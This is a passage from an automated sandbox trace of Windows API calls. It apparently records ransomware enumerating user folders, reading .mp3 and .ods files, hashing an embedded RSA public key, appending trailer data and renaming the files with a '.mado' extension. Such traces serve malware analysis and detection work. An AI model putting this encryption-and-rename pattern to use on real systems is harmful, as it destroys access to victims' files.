(HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67078 [0204.904] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0204.904] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0204.905] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0204.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67078 [0204.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67258 [0204.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x32f9250 [0204.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67168 [0204.905] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0204.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x32ef238 [0204.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67078 [0204.905] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0204.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67168 [0204.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67258 [0204.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x32e51f8 [0204.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b670f0 [0204.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.905] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0204.905] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0204.905] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.905] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.905] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.905] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.905] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\") returned="fDly50O\\" [0204.906] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0204.906] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.906] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.906] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.906] PathFindFileNameW (pszPath="") returned="" [0204.906] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fa8fbd0, ftCreationTime.dwHighDateTime=0x1d5dedc, ftLastAccessTime.dwLowDateTime=0xb2934790, ftLastAccessTime.dwHighDateTime=0x1d5dc3d, ftLastWriteTime.dwLowDateTime=0xb2934790, ftLastWriteTime.dwHighDateTime=0x1d5dc3d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0204.907] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fa8fbd0, ftCreationTime.dwHighDateTime=0x1d5dedc, ftLastAccessTime.dwLowDateTime=0xb2934790, ftLastAccessTime.dwHighDateTime=0x1d5dc3d, ftLastWriteTime.dwLowDateTime=0xb2934790, ftLastWriteTime.dwHighDateTime=0x1d5dc3d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0204.907] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a83c0e0, ftCreationTime.dwHighDateTime=0x1d5e4c0, ftLastAccessTime.dwLowDateTime=0xaa5de160, ftLastAccessTime.dwHighDateTime=0x1d5d9cd, ftLastWriteTime.dwLowDateTime=0xaa5de160, ftLastWriteTime.dwHighDateTime=0x1d5d9cd, nFileSizeHigh=0x0, nFileSizeLow=0xbebf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3Y-GLSCY.mp3", cAlternateFileName="")) returned 1 [0204.907] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\3Y-GLSCY.mp3") returned=".mp3" [0204.907] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\3Y-GLSCY.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fdly50o\\3y-glscy.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.907] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=48831) returned 1 [0204.907] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.909] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xbe99, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.909] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.911] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xbebf, lpOverlapped=0x0) returned 1 [0204.912] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.912] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.912] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.912] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0204.913] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.913] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.913] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.913] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.913] GetLastError () returned 0x0 [0204.913] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.913] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0204.913] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.913] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.913] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.913] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c6a8 [0204.914] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xbebf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.914] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0204.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0204.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0204.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.914] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) returned 1 [0204.914] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.914] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.915] CloseHandle (hObject=0x63c) returned 1 [0204.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0204.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74e80 [0204.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0204.916] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\3Y-GLSCY.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fdly50o\\3y-glscy.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\3Y-GLSCY.mp3.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fdly50o\\3y-glscy.mp3.mado")) returned 1 [0204.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.917] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0204.918] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78e41ee0, ftCreationTime.dwHighDateTime=0x1d5d835, ftLastAccessTime.dwLowDateTime=0xbd5293f0, ftLastAccessTime.dwHighDateTime=0x1d5e5b3, ftLastWriteTime.dwLowDateTime=0xbd5293f0, ftLastWriteTime.dwHighDateTime=0x1d5e5b3, nFileSizeHigh=0x0, nFileSizeLow=0x320d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E-78Ddwse5QS5w5.ods", cAlternateFileName="E-78DD~1.ODS")) returned 1 [0204.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0204.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.918] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\E-78Ddwse5QS5w5.ods") returned=".ods" [0204.918] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\E-78Ddwse5QS5w5.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fdly50o\\e-78ddwse5qs5w5.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.918] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=12813) returned 1 [0204.918] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.921] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x31e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.921] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.922] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.922] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x320d, lpOverlapped=0x0) returned 1 [0204.929] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.929] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.929] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.929] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0204.930] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.930] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.930] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.930] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.930] GetLastError () returned 0x0 [0204.930] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.930] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0204.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.930] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.930] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.930] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3210) returned 0x3b74e80 [0204.930] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80f60 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe520 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80fa8 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe538 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe568 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5b0 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe580 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b72b80 [0204.931] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b78098 [0204.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe568 | out: hHeap=0x2c0000) returned 1 [0204.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe580 | out: hHeap=0x2c0000) returned 1 [0204.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5b0 | out: hHeap=0x2c0000) returned 1 [0204.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 